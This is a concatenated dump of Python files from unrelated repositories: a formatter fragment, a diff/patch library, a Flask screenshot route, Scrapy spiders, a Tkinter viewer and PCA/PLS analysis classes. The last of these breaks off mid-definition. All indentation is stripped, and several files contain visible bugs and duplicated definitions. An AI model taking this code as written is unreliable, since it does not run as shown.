if pytree_utils.NodeName(node.parent) == 'if_stmt':
_SetSplitPenalty(node.children[-1], STRONGLY_CONNECTED)
else:
if len(node.children) > 2:
_SetSplitPenalty(pytree_utils.FirstLeafNode(node.children[1]), EXPR)
_SetSplitPenalty(node.children[-1], ATOM)
elif node.children[0].value in '[{' and len(node.children) == 2:
# Keep empty containers together if we can.
_SetUnbreakable(node.children[-1])
def Visit_testlist_gexp(self, node): # pylint: disable=invalid-name
self.DefaultNodeVisit(node)
prev_was_comma = False
for child in node.children:
if isinstance(child, pytree.Leaf) and child.value == ',':
_SetUnbreakable(child)
prev_was_comma = True
else:
if prev_was_comma:
_SetSplitPenalty(pytree_utils.FirstLeafNode(child), TOGETHER)
prev_was_comma = False
def _SetUnbreakable(node):
"""Set an UNBREAKABLE penalty annotation for the given node."""
_RecAnnotate(node, pytree_utils.Annotation.SPLIT_PENALTY, UNBREAKABLE)
def _SetStronglyConnected(*nodes):
"""Set a STRONGLY_CONNECTED penalty annotation for the given nodes."""
for node in nodes:
_RecAnnotate(node, pytree_utils.Annotation.SPLIT_PENALTY,
STRONGLY_CONNECTED)
def _SetExpressionPenalty(node, penalty):
"""Set a penalty annotation on children nodes."""
def RecExpression(node, first_child_leaf):
if node is first_child_leaf:
return
if isinstance(node, pytree.Leaf):
if node.value in {'(', 'for', 'if'}:
return
penalty_annotation = pytree_utils.GetNodeAnnotation(
node, pytree_utils.Annotation.SPLIT_PENALTY, default=0)
if penalty_annotation < penalty:
_SetSplitPenalty(node, penalty)
else:
for child in node.children:
RecExpression(child, first_child_leaf)
RecExpression(node, pytree_utils.FirstLeafNode(node))
def _SetBitwiseOperandPenalty(node, op):
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == op:
if style.Get('SPLIT_BEFORE_BITWISE_OPERATOR'):
_SetSplitPenalty(child, style.Get('SPLIT_PENALTY_BITWISE_OPERATOR'))
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]),
style.Get('SPLIT_PENALTY_BITWISE_OPERATOR'))
def _SetExpressionOperandPenalty(node, ops):
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if pytree_utils.NodeName(child) in ops:
if style.Get('SPLIT_BEFORE_ARITHMETIC_OPERATOR'):
_SetSplitPenalty(child, style.Get('SPLIT_PENALTY_ARITHMETIC_OPERATOR'))
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]),
style.Get('SPLIT_PENALTY_ARITHMETIC_OPERATOR'))
def _IncreasePenalty(node, amt):
"""Increase a penalty annotation on children nodes."""
def RecExpression(node, first_child_leaf):
if node is first_child_leaf:
return
if isinstance(node, pytree.Leaf):
if node.value in {'(', 'for'}:
return
penalty = pytree_utils.GetNodeAnnotation(
node, pytree_utils.Annotation.SPLIT_PENALTY, default=0)
_SetSplitPenalty(node, penalty + amt)
else:
for child in node.children:
RecExpression(child, first_child_leaf)
RecExpression(node, pytree_utils.FirstLeafNode(node))
def _RecAnnotate(tree, annotate_name, annotate_value):
"""Recursively set the given annotation on all leafs of the subtree.
Takes care to only increase the penalty. If the node already has a higher
or equal penalty associated with it, this is a no-op.
Args:
tree: subtree to annotate
annotate_name: name of the annotation to set
annotate_value: value of the annotation to set
"""
for child in tree.children:
_RecAnnotate(child, annotate_name, annotate_value)
if isinstance(tree, pytree.Leaf):
cur_annotate = pytree_utils.GetNodeAnnotation(
tree, annotate_name, default=0)
if cur_annotate < annotate_value:
pytree_utils.SetNodeAnnotation(tree, annotate_name, annotate_value)
def _StronglyConnectedCompOp(op):
if (len(op.children[1].children) == 2 and
pytree_utils.NodeName(op.children[1]) == 'comp_op'):
if (pytree_utils.FirstLeafNode(op.children[1]).value == 'not' and
pytree_utils.LastLeafNode(op.children[1]).value == 'in'):
return True
if (pytree_utils.FirstLeafNode(op.children[1]).value == 'is' and
pytree_utils.LastLeafNode(op.children[1]).value == 'not'):
return True
if (isinstance(op.children[1], pytree.Leaf) and
op.children[1].value in {'==', 'in'}):
return True
return False
def _DecrementSplitPenalty(node, amt):
penalty = pytree_utils.GetNodeAnnotation(
node, pytree_utils.Annotation.SPLIT_PENALTY, default=amt)
penalty = penalty - amt if amt < penalty else 0
_SetSplitPenalty(node, penalty)
def _SetSplitPenalty(node, penalty):
pytree_utils.SetNodeAnnotation(node, pytree_utils.Annotation.SPLIT_PENALTY,
penalty)
``` |
{
"source": "1f604/diffpatchlib",
"score": 3
} |
#### File: 1f604/diffpatchlib/diffpatchlib.py
```python
from __future__ import print_function
import difflib
import hashlib
import re
import traceback
import sys
import subprocess
_diff_header_pat = re.compile("^sha256s: ([0-9a-f]+) ([0-9a-f]+)$")
_hdr_pat = re.compile("^@@ -(\d+),?(\d+)? \+(\d+),?(\d+)? @@$")
# https://stackoverflow.com/a/44873382
def sha256sum(filename):
"""
Parameters
----------
filename : string
Returns
-------
hex_digest : string
"""
h = hashlib.sha256()
b = bytearray(128*1024)
mv = memoryview(b)
with open(filename, 'rb', buffering=0) as f:
for n in iter(lambda : f.readinto(mv), 0):
h.update(mv[:n])
return h.hexdigest()
def __check_newline_terminated(files):
for filename, lines in files:
if lines[-1][-1] != '\n':
print("ERROR: Missing newline at end of file {} ending in: ".format(filename))
print(lines[-1])
exit(1)
def __make_patch(oldlines, newlines, filename1, filename2):
"""
Get unified string diff between two strings.
Returns empty string if strings are identical.
"""
# ensure strings are newline terminated
__check_newline_terminated(((filename1, oldlines), (filename2, newlines)))
# get the unified diff
diffs = difflib.unified_diff(oldlines, newlines, fromfile=filename1, tofile=filename2, n=0)
# diffs = list(diffs); print(diffs)
return list(diffs)
def __apply_patch(oldlines, patchlines):
"""
Apply unified diff patch to string old to recover newer string.
"""
if not patchlines:
return oldlines
result = []
patch_pointer = 0
old_current_pointer = 0
allowed_line_starts = "@+-"
#for char in allowed_line_starts:
# print("allowed:", char, ord(char))
while patch_pointer < len(patchlines) and patchlines[patch_pointer].startswith(("---","+++")):
patch_pointer += 1 # skip header lines
while patch_pointer < len(patchlines):
# get starting line number from hunk header
m = _hdr_pat.match(patchlines[patch_pointer])
if not m:
print(patchlines)
raise Exception("Cannot process diff")
patch_pointer += 1
old_start_pointer = int(m.group(1))-1 + (m.group(2) == '0')
result.extend(oldlines[old_current_pointer:old_start_pointer])
old_current_pointer = old_start_pointer
# go through hunk
while patch_pointer < len(patchlines) and patchlines[patch_pointer][0] != '@':
if patch_pointer + 1 < len(patchlines) and patchlines[patch_pointer+1][0] not in allowed_line_starts:
print("ERROR: line does not begin with expected symbol:", ord(patchlines[patch_pointer+1][0]), patchlines[patch_pointer+1])
exit(1)
line = patchlines[patch_pointer]
patch_pointer += 1
assert(len(line) > 0)
assert(line[0] in allowed_line_starts)
if line[0] == '+':
result.append(line[1:])
else:
old_current_pointer += 1
result.extend(oldlines[old_current_pointer:])
return result
def __test_patch(a, b, patch):
try:
assert __apply_patch(a, patch) == b
except Exception as e:
print("=== a ===")
print([a])
print("=== b ===")
print([b])
print("=== patch ===")
print([patch])
print("=== a with patch applied ===")
print(__apply_patch(a, patch))
traceback.print_exc()
sys.exit(-1)
def __get_tested_patch(oldlines, newlines, filename1, filename2):
"""
This is the function you want to call 99% of the time.
"""
# first generate the patch
patch = __make_patch(oldlines, newlines, filename1, filename2)
# now test it
__test_patch(oldlines, newlines, patch)
# now return it
return patch
def get_diff(old_lines, new_lines, *, old_filename = "old_file", new_filename = "new_file"):
"""
Parameters
----------
old_lines : [string]
new_lines : [string]
old_filename : string
new_filename : string
Returns
-------
patch_lines : [string]
"""
# with open(filename1) as f:
# old_lines = f.readlines()
# with open(filename2) as f:
# new_lines = f.readlines()
old_hash = sha256sum(old_filename)
new_hash = sha256sum(new_filename)
result = ["sha256s: " + old_hash + " " + new_hash + '\n']
return result + __get_tested_patch(old_lines, new_lines, old_filename, new_filename)
def get_verified_unix_diff(old_filename, new_filename):
"""
Parameters
----------
old_filename : string
new_filename : string
Returns
-------
patch_lines : [string]
"""
old_hash = sha256sum(old_filename)
new_hash = sha256sum(new_filename)
result = ["sha256s: " + old_hash + " " + new_hash + '\n']
try:
subprocess.check_output(['diff', old_filename, new_filename, '-u0'])
result = []
except subprocess.CalledProcessError as e:
if e.returncode != 0 and e.returncode != 1:
raise RuntimeError("command '{}' return with error (code {}): {}".format(e.cmd, e.returncode, e.output))
result += str(e.output, 'utf-8').splitlines(True)
# verify the patch
with open(old_filename) as f:
old_lines = f.readlines()
applied_lines = apply_diff_unchecked(old_lines, result)
check_hash_matches(applied_lines, new_hash)
return result
def get_hashes(patch_filename):
with open(patch_filename) as f:
patch_line = f.readline()
return __get_hashes(patch_line)
def __get_hashes(first_line_of_patch):
m = _diff_header_pat.match(first_line_of_patch)
if not m:
print(first_line_of_patch)
raise Exception("Expected hashes at first line of patch")
return m.group(1), m.group(2)
def apply_diff_unchecked(old_lines, patch_lines):
"""
VERY IMPORTANT: You must manually verify that the results are correct.
This is because the verification functions are slow.
Parameters
----------
old_lines : [string]
patch_lines : [string]
Returns
-------
new_lines : [string]
"""
return __apply_patch(old_lines, patch_lines[1:])
def __apply_diff_verified(old_lines, patch_lines):
"""
Parameters
----------
old_lines : [string]
patch_lines : [string]
Returns
-------
new_lines : [string]
"""
old_hash, new_hash = __get_hashes(patch_lines[0])
check_hash_matches(old_lines, old_hash)
new_lines = __apply_patch(old_lines, patch_lines[1:])
check_hash_matches(new_lines, new_hash)
return new_lines
def check_hash_matches(lines, hash):
contents = ''.join(lines).encode('utf-8')
hash_of_lines = hashlib.sha256(contents).hexdigest()
if hash != hash_of_lines:
raise Exception("Hash of lines does not match the hash supplied")
def __apply_diff_verified(old_lines, patch_lines):
"""
Parameters
----------
old_lines : [string]
patch_lines : [string]
Returns
-------
new_lines : [string]
"""
contents = ''.join(old_lines).encode('utf-8')
hash = hashlib.sha256(contents).hexdigest()
m = _diff_header_pat.match(patch_lines[0])
if not m:
print(patch_lines[0])
raise Exception("Expected hash at first line of patch")
if m.group(1) != hash:
raise Exception("Hash of file does not match the hash in patch")
return __apply_patch(old_lines, patch_lines[1:])
if __name__ == '__main__':
print("This library provides 4 useful functions:")
print("1. get_verified_unix_diff(old_filename, new_filename)")
print("2. apply_diff_unchecked(old_lines, patch_lines)")
print("3. get_hashes(patch_filename)")
print("4. check_hash_matches(lines, hash)")
``` |
{
"source": "1f9763/web2img",
"score": 3
} |
#### File: 1f9763/web2img/grab.py
```python
from flask import Flask,render_template
from selenium import webdriver
from PIL import Image
import time
import os
import StringIO
import base64
app=Flask(__name__)
@app.route('/getweather')
def getweather():
url='http://www.jma.go.jp/jp/week/347.html'
driver=webdriver.PhantomJS()
driver.set_window_size(1280,800)
driver.get(url)
#----------------------execute js---------------------
jscode='''
document.getElementById("infotablefont").caption.innerHTML='週間天気予報:佐賀県';
'''
driver.execute_script(jscode)
# time.sleep(1)
#----------------------find element-------------------
imgelement=driver.find_element_by_id('infotablefont')
location=imgelement.location
size=imgelement.size
imgelement2=driver.find_element_by_class_name('forecast-bottom')
donesize=imgelement2.size
data=driver.get_screenshot_as_png()
im = Image.open(StringIO.StringIO(data))
left = location['x']
top = location['y']
right = left + size['width']
bottom = location['y'] + size['height']+donesize['height']
im = im.crop((left,top,right,bottom))
output=StringIO.StringIO()
im.save(output,'PNG')
output.seek(0)
output_s = output.read()
b64 = base64.b64encode(output_s)
open("templates/weather.html","w+").write('<img src="data:image/png;base64,{0}"/>'.format(b64))
return render_template('weather.html')
if __name__=='__main__':
# app.run(host='0.0.0.0',debug=True)
app.run()
``` |
{
"source": "1fabunicorn/SWE_Project",
"score": 2
} |
#### File: SWE_Project/SWE_Project/pipelines.py
```python
from src.ClassEnumeration import ClassEnumeration
class SweProjectPipeline:
enumeration = ClassEnumeration()
def open_spider(self, spider):
self.file = open('items.txt', 'w')
def close_spider(self, spider):
self.file.close()
def process_item(self, item, spider):
if spider.name == 'default':
pass
return item
```
#### File: SWE_Project/spiders/EnnumeratingSpider.py
```python
import scrapy
from scrapy_selenium import SeleniumRequest
from urllib.parse import urlparse, parse_qs, urljoin
from src.ClassEnumeration import ClassEnumeration
from scrapy.utils.response import open_in_browser
class EnnumeratingSpider(scrapy.Spider):
name = 'default'
# allowed_domains = ['www.adoredvintage.com']
enumeration = ClassEnumeration()
urls = [ "https://partakefoods.com", "https://uppercasemagazine.com", "https://www.smartypits.com",
"https://www.manitobah.com", "https://packagefreeshop.com", "https://flourist.com", "https://www.naja.co",
"https://unitedbyblue.com", "https://bailly.co", "https://www.lunchskins.com"
"https://www.givemetap.com", "https://www.silkandwillow.com", "https://www.tazachocolate.com",
"https://www.makergear.com", "https://www.parklandmfg.ca" ]
# urls = ["https://www.givemetap.com"]
def start_requests(self):
for url in self.urls:
yield SeleniumRequest(url=url + "/collections/all", callback=self.parse,
script='window.scrollTo(0,document.body.scrollHeight);')
def parse(self, response):
count = 0
yield {
"url": response.url,
"results": self.enumeration.get(response.css("main")),
"results_all" : self.enumeration.get(response)
}
# for item in response.css(".product-collection__content"):
# count += 1
# yield {
# "name": item.css(".product-collection__content h4 a:first-child::text").get(),
# #"description": item.css(".product-collection__description p::text").get(),
# "price": item.css(".product-collection__price span span::text").get()
# }
if count > 0: # Dynamic pagination
urlparams = parse_qs(urlparse(response.url).query)
newpage = 2
if "page" in urlparams:
newpage = int(urlparams["page"][0]) + 1
yield response.follow(urljoin(response.url, "?page=" + str(newpage)), callback=self.parse)
# #button = response.css(".pagination span span a::attr(href)").get()
# #if button is not None:
# #yield response.follow(button, callback=self.parse)
```
#### File: SWE_Project/spiders/selenium_spider.py
```python
import scrapy
from scrapy_selenium import SeleniumRequest
class selenium_spider(scrapy.Spider):
name = "selenium"
url = 'https://www.deathwishcoffee.com/collections/coffee'
def start_requests(self):
yield SeleniumRequest(url=self.url, callback=self.parse)
def parse(self, response):
for item in response.css(".product-hero-card__item-title"):
yield {
"content": item.get()
}
```
#### File: SWE_Project/spiders/shopify_molly.py
```python
import scrapy
from scrapy_splash import SplashRequest
from w3lib.http import basic_auth_header
import os
class ShopifyMollySpider(scrapy.Spider):
name = 'shopify_molly'
allowed_domains = ['www.mollyjogger.com']
urls = ['https://www.mollyjogger.com/collections/inventory']
def start_requests(self):
for url in self.urls:
#yield scrapy.Request(url=url, callback=self.parse)
yield SplashRequest(url, self.parse, endpoint='render.html', args={'wait': 2},
splash_headers={'Authorization': basic_auth_header(os.getenv('SPLASH_API_KEY'), '')})
def parse(self, response):
for item in response.css(".product"):
yield {
"name": item.css(".product-title::text").get(),
"price": item.css(".price .money::text").get()
}
``` |
{
"source": "1FengL/faster-rcnn.pytorch",
"score": 3
} |
#### File: 1FengL/faster-rcnn.pytorch/gui.py
```python
from Tkinter import *
from PIL import Image, ImageTk
import os
class mygui():
def __init__(self, image_dir, info_dir):
self.root = Tk()
self.root.title("Surgery Kit Detection")
#self.root.geometry("500x500")
self.find_images(image_dir)
self.find_infos(info_dir)
self.current_image = 0
tkimg1 = self.ShowImg(self.images[self.current_image])
self.PanelA = Label(self.root,image=tkimg1)
self.PanelA.grid(row=0, column=0)
tkimg2 = self.ShowImg(self.dets[self.current_image])
self.PanelB = Label(self.root, image=tkimg2)
self.PanelB.grid(row=0, column=1)
self.text = Label(self.root, text='111')
self.text,grid(row=3, columnspan=2)
self.BtnPre = Button(self.root, text="Previous", command=self.select_previous)
self.BtnNxt = Button(self.root, text="Next", command=self.select_next)
self.BtnPre.grid(row=1, column=0, columnspan=2)
self.BtnNxt.grid(row=2, column=0, columnspan=2)
self.root.mainloop()
def find_images(self, image_dir):
self.images = []
self.dets = []
for currentName in os.listdir(image_dir):
if 'det' in currentName:
self.dets.append(os.path.join(image_dir, currentName))
else:
self.images.append(os.path.join(image_dir, currentName))
def find_infos(self, info_dir):
self.infos = []
cnt = -1
for f_name in os.listdir(info_dir):
if "info" in f_name:
cnt += 1
self.infos.append([])
with open(os.path.join(info_dir, f_name)) as f:
for line in f:
a,b,c,d = line.strip().split("+")
self.infos[cnt].append([a,b,c,d])
def ShowImg(self, img_dir):
return ImageTk.PhotoImage(Image.open(img_dir))
def refreshing(self):
tkimg1 = self.ShowImg(self.images[self.current_image])
self.PanelA.configure(image=tkimg1)
self.PanelA.image = tkimg1
tkimg2 = self.ShowImg(self.dets[self.current_image])
self.PanelB.configure(image=tkimg2)
self.PanelB.image = tkimg2
def select_previous(self):
if self.current_image > 0:
self.current_image -= 1
self.refreshing()
def select_next(self):
if self.current_image < len(self.images)-1:
self.current_image += 1
self.refreshing()
if __name__ == '__main__':
mygui = mygui("images", "images")
``` |
{
"source": "1feres1/pynmranalysis",
"score": 3
} |
#### File: pynmranalysis/pynmranalysis/analysis.py
```python
import numpy as np
from sklearn.base import TransformerMixin , BaseEstimator , ClassifierMixin , clone ,RegressorMixin
from sklearn import metrics
from numpy import interp
import pandas as pd
from sklearn.model_selection import KFold
from sklearn.cross_decomposition import PLSRegression
from copy import deepcopy
from sklearn.decomposition import PCA
from sklearn.preprocessing import StandardScaler
import matplotlib.pyplot as plt
from scipy.stats import f
#####################################################################################
class PyPCA(BaseEstimator):
"""
PyPAC object - Wrapper for sklearn.decomposition PCA algorithms for Omics data analysis
:param pca_algorithm: a formatted string to print out what the animal says
:type pca_algorithm: PCA implementation of sklearn
:param n_comps: number of PCA components (default 2)
:type n_comps: int
:param loadings: the coefficients of the linear combination of the original variables from which the principal components (PCs) are constructed.
:type loadings: data matrix
:param isfitted: indicate if the model is fitted or not (default False)
:type isfitted: bool
:param scores: the scores of PCA model
:type scores: numpy array
:param m_params: indicate the models results params (default None)
:type m_params: dic
"""
def __init__(self, n_comps=2, scaler=StandardScaler()):
"""Constructor method
"""
# Perform the check with is instance but avoid abstract base class runs. PCA needs number of comps anyway!
pca = PCA(n_components=n_comps)
assert isinstance(scaler,
TransformerMixin) or scaler is None, "sclaler must be an sklearn transformer-like or None"
# initialize variabels
self.pca_algorithm = pca
self.n_comps = n_comps
self.scaler = scaler
self.loadings = None
self.isfitted = False
self.scores = None
self.m_params = None
def transform(self, x):
"""
get the projection of the data metrix x on the pricipal componants of PCA
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return: PCA projections (x scores)
:rtype: numpy.ndarray, shape [n_samples, ncomps]
:raise ValueError: If there are problems with the input or during model fitting.
"""
try:
if self.scaler is not None:
xscaled = self.scaler.transform(x)
return self.pca_algorithm.transform(xscaled)
else:
return self.pca_algorithm.transform(x)
except ValueError as ver:
raise ver
def _residual_ssx(self, x):
"""
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return: RSS resudual sum of squares
:rtype: int
"""
pred_scores = self.transform(x)
x_reconstructed = self.scaler.transform(self.inverse_transform(pred_scores))
xscaled = self.scaler.transform(x)
residuals = np.sum((xscaled - x_reconstructed) ** 2, axis=1)
return residuals
def inverse_transform(self, scores):
"""
inverse transformation of x score data to the original data before projection
:param scores: The projections ( x scores) (rows : samples , columns : principal componants)
:return: Data matrix in the original format (rows : samples , columns : variables )
:rtype: int
"""
# Scaling check for consistency
if self.scaler is not None:
xinv_prescaled = self.pca_algorithm.inverse_transform(scores)
xinv = self.scaler.inverse_transform(xinv_prescaled)
return xinv
else:
return self.pca_algorithm.inverse_transform(scores)
def fit_transform(self, x):
"""
Fit a model and return the x scores (rows : samples , columns : principal componants)
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return: PCA projections ( x scores) after transforming x
:rtype: numpy.ndarray, shape (n_samples, n_comps)
:raise ValueError: If there are problems with the input or during model fitting.
"""
try:
self.fit(x, )
return self.transform(x)
except ValueError as ver:
raise ver
def fit(self, x):
"""
Perform model fitting on the provided x data matrix and calculate basic goodness-of-fit metrics.
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:raise ValueError: If any problem occurs during fitting.
"""
try:
# check if we will use scaling or not for PCA
if self.scaler is not None:
xscaled = self.scaler.fit_transform(x)
self.pca_algorithm.fit(xscaled)
self.scores = self.pca_algorithm.transform(xscaled)
ss = np.sum((xscaled - np.mean(xscaled, 0)) ** 2)
predicted = self.pca_algorithm.inverse_transform(self.scores)
rss = np.sum((xscaled - predicted) ** 2)
else:
self.pca_algorithm.fit(x, )
self.scores = self.pca_algorithm.transform(x)
ss = np.sum((x - np.mean(x, 0)) ** 2)
predicted = self.pca_algorithm.inverse_transform(self.scores)
rss = np.sum((x - predicted) ** 2)
# set model parmetres
self.m_params = {'R2X': 1 - (rss / ss), 'VarExp': self.pca_algorithm.explained_variance_,
'VarExpRatio': self.pca_algorithm.explained_variance_ratio_}
# For "Normalised" DmodX calculation
resid_ssx = self._residual_ssx(x)
s0 = np.sqrt(resid_ssx.sum() / ((self.scores.shape[0] - self.n_comps - 1) * (x.shape[1] - self.n_comps)))
self.m_params['S0'] = s0
# set loadings
self.loadings = self.pca_algorithm.components_
# set fitted to true
self.isfitted = True
except ValueError as ver:
raise ver
def hotelling_T2(self, comps=None, alpha=0.05):
"""
Obtain the parameters for the Hotelling T2 ellipse at the desired significance level.
:param list comps defaults to None
:type int or None
:param float alpha: Significance level defaults to 0.05
:type float
:return: The Hotelling T2 ellipsoid radii at vertex
:rtype: float
:raise AtributeError: If the model is not fitted
:raise ValueError: If the components requested are higher than the number of components in the model
:raise TypeError: If comps is not None or list/numpy 1d array and alpha a float
"""
try:
if self.isfitted is False:
raise AttributeError("Model is not fitted yet ")
n_samples = self.scores.shape[0]
if comps is None:
n_comps = self.n_comps
ellips = self.scores[:, range(self.n_comps)] ** 2
ellips = 1 / n_samples * (ellips.sum(0))
else:
n_comps = len(comps)
ellips = self.scores[:, comps] ** 2
ellips = 1 / n_samples * (ellips.sum(0))
# F stat
fs = (n_samples - 1) / n_samples * n_comps * (n_samples ** 2 - 1) / (n_samples * (n_samples - n_comps))
fs = fs * f.ppf(1 - alpha, n_comps, n_samples - n_comps)
hoteling_t2 = list()
for comp in range(n_comps):
hoteling_t2.append(np.sqrt((fs * ellips[comp])))
return np.array(hoteling_t2)
except AttributeError as atrer:
raise atrer
except ValueError as valer:
raise valer
except TypeError as typer:
raise typer
def dmodx(self, x):
"""
Normalised DmodX measure
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return: The Normalised DmodX measure for each sample
:rtype float
"""
resids_ssx = self._residual_ssx(x)
s = np.sqrt(resids_ssx / (self.loadings.shape[1] - self.n_comps))
dmodx = np.sqrt((s / self.m_params['S0']) ** 2)
return dmodx
def _dmodx_fcrit(self, x, alpha=0.05):
"""
Calculate the degree of freedom of the PCA model
:param alpha: significance level defaults to 0.05
:type float
:return dmodx fcrit
:rtype float
"""
# Degrees of freedom for the PCA model (denominator in F-stat)
dmodx_fcrit = f.ppf(1 - alpha, x.shape[1] - self.n_comps - 1,
(x.shape[0] - self.n_comps - 1) * (x.shape[1] - self.n_comps))
return dmodx_fcrit
def outlier(self, x, comps=None, measure='T2', alpha=0.05):
"""
using F statistic and T2 /Dmodx mesure to determine outliers
:param x: data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param comps: Which components to use (for Hotelling T2 only) defaults to None
:type int or None
:param measure: T2 or DmodX defaults to 'T2'
:type str
:param alpha: Significance level defaults to 0.05
:type float
:return: List of ouliers indices
:rtype: list
"""
try:
if measure == 'T2':
scores = self.transform(x)
t2 = self.hotelling_T2(comps=comps)
outlier_idx = np.where(((scores ** 2) / t2 ** 2).sum(axis=1) > 1)[0]
elif measure == 'DmodX':
dmodx = self.dmodx(x)
dcrit = self._dmodx_fcrit(x, alpha)
outlier_idx = np.where(dmodx > dcrit)[0]
else:
print("Select T2 (Hotelling T2) or DmodX as outlier exclusion criteria")
return outlier_idx
except Exception as exp:
raise exp
def score_plot(self):
""" plot the projection of the x scores on the firest 2 components
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return 2 dimentional scatter plot """
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
plt.scatter(self.scores[:, 0], self.scores[:, 1] , s=100, edgecolors='k',)
for i in range(self.scores.shape[0]):
plt.text(x=self.scores[i, 0] + 0.3, y=self.scores[i, 1] + 0.3, s=i + 1)
plt.xlabel('PC 1')
plt.ylabel('PC 2')
plt.title('PCA score plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
def scree_plot(self):
""" plot the explained varianace of each componant in the PCA model
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:return scree plot """
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
features = ['PC ' + str(x) for x in range(1, self.n_comps + 1)]
plt.bar(features, self.m_params['VarExpRatio'], color='black')
plt.ylabel('variance %')
plt.xlabel('PCA features')
plt.xticks = features
plt.title('Scree plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
def outlier_plot(self, x, comps=None, measure='T2', alpha=0.05):
""" detect outlier in x metric based on their variance and plot them with different color
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:param comps: Which components to use (for Hotelling T2 only) defaults to None
:type int or None
:param measure: T2 or DmodX defaults to 'T2'
:type str
:param alpha: Significance level defaults to 0.05
:type float
:return scree plot """
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
# get ouliers index
outliers = self.outlier(x=x, comps=comps, measure=measure, alpha=alpha)
# not outlier index
not_outliers = [x for x in np.arange(self.scores.shape[0]) if x not in outliers]
plt.scatter(self.scores[not_outliers, 0], self.scores[not_outliers, 1], color='black', label='not outlier' ,s=100, edgecolors='k',)
plt.scatter(self.scores[outliers, 0], self.scores[outliers, 1], color='r', label='outlier' , s=100, edgecolors='k',)
for i in range(self.scores.shape[0]):
plt.text(x=self.scores[i, 0] + 0.3, y=self.scores[i, 1] + 0.3, s=i + 1)
plt.ylabel('PCA 2')
plt.xlabel('PCA 1')
plt.legend()
plt.title('outliers plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
def target_plot(self, y):
""" the same as score plot but instead but we add color to each sample based on their classe
:param x : data metrix to be fit
:type x: numpy.ndarray, shape (rows : samples , columns : variables )
:params y : target variable (list) (each class has unique integer value)
:return scree plot """
assert isinstance(y, (list, np.ndarray)) and len(y) == self.scores.shape[0]
try:
if self.isfitted == False:
raise AttributeError("Model is not fitted yet ")
targets = np.unique(y)
colors = ['r', 'g']
for target, color in zip(targets, colors):
indicesToKeep = [x for x in np.arange(self.scores.shape[0]) if y[x] == target]
plt.scatter(self.scores[indicesToKeep, 0]
, self.scores[indicesToKeep, 1]
, c=color, label='class ' + str(target) ,s=100, edgecolors='k',
)
for i in range(self.scores.shape[0]):
plt.text(x=self.scores[i, 0] + 0.3, y=self.scores[i, 1] + 0.3, s=i + 1)
plt.ylabel('PCA 2')
plt.xlabel('PCA 1')
plt.legend()
plt.title('target plot')
plt.show()
except AttributeError as atter:
raise atter
except TypeError as typer:
raise typer
#########################################################################
class PyPLS(BaseEstimator, RegressorMixin, TransformerMixin):
"""
PyPLS object semilar to PLS model in croos decomposition module in sklearn
this object will be used for calculation of PLS-DA params (R2X , R2Y)
the implemntation of this algorithme is taken from the SIMPLS implementation
(SIMPLS, is proposed which calculates the PLS factors directly as linear combinations of the original variables)
you can check the original paper "SIMPLS: An alternative approach to partial least squares regression", DOI : "https://doi.org/10.1016/0169-7439(93)85002-X"
:param scores_t: projection of X (default None )
:type scores_t: data matrix
:param scores_u: projection of Y (default None)
:type scores_u: data matrix
:param isfitted: indicate if the model is fitted or not (default None )
:type isfitted: bool
:param weights_w: maximum covariance of X with Y (default None )
:type weights_w: data matrix
:param loadings_p: loading of model simelar to PCA loading assosiated with T to X(default None )
:type loadings_p : data matrix
:param loadings_q: loading of model simelar to PCA loading assosiated with U to Y (default None )
:type loadings_q: data matrix
:param rotations_ws: the rotation of X in the latin variable space (default None )
:type rotations_ws: data matrix
:param rotations_cs: the rotation of Y in the latin variable space (default None )
:type rotations_cs: data matrix
:param b_u: the beta from regration T on U (default None )
:type b_u: data matrix
:param b_t: the beta from regration U on T (default None )
:type b_t: data matrix
:param ncomps: number of component (laltent variables ) (default 2 )
:type ncomps: int
:param beta_coeffs: the cofficients of PLS regression model (default None )
:type beta_coeffs: data matrix
:param x_scaler:used on independent variables X (default None )
:type x_scaler:sklearn sclaer
:param y_scaler: used on target variable Y(default None )
:type y_scaler: sklearn sclaer
:param m_params: the parmas of model after fitting
:type m_params: dict
"""
def __init__(self, ncomps=2, xscaler=StandardScaler()):
"""Constructor method
"""
try:
# call sklearn PLS model with the same number of componants
pls_algorithm = PLSRegression(ncomps, scale=False)
# verify that scaler used is sklearn based scaleer or None
assert isinstance(xscaler, TransformerMixin) or xscaler is None, "scaler used is not defined"
self.pls_algorithm = pls_algorithm
# assign most variable to None because thay will be set when calling fit function
self.scores_t = None # projection of X
self.scores_u = None # projection of Y
self.weights_w = None # maximum covariance of X with Y
self.weights_c = None # maximum covariance
self.loadings_p = None # loading of model simelar to PCA loading assosiated with T to X
self.loadings_q = None # loading of model simelar to PCA loading assosiated with U to Y
self.rotations_ws = None # the rotation of X in the latin variable space
self.rotations_cs = None # the rotation of Y in the latin variable space
self.b_u = None # the beta from regration T on U
self.b_t = None # the beta from regression U on T
self.beta_coeffs = None # the cofficients of PLS regression model
self.ncomps = ncomps # number of component (altent variablels )
self.x_scaler = xscaler # scaler used on independent ariables X
self.y_scaler = StandardScaler(with_std=False) # scaler used on dependent ariables Y
self.cvParameters = None # cross validation params
self.m_params = None # model params
self.isfitted = False # boolien variable to indicate that model is fitted
except TypeError as terr:
print(terr.args[0])
def fit(self, x, y):
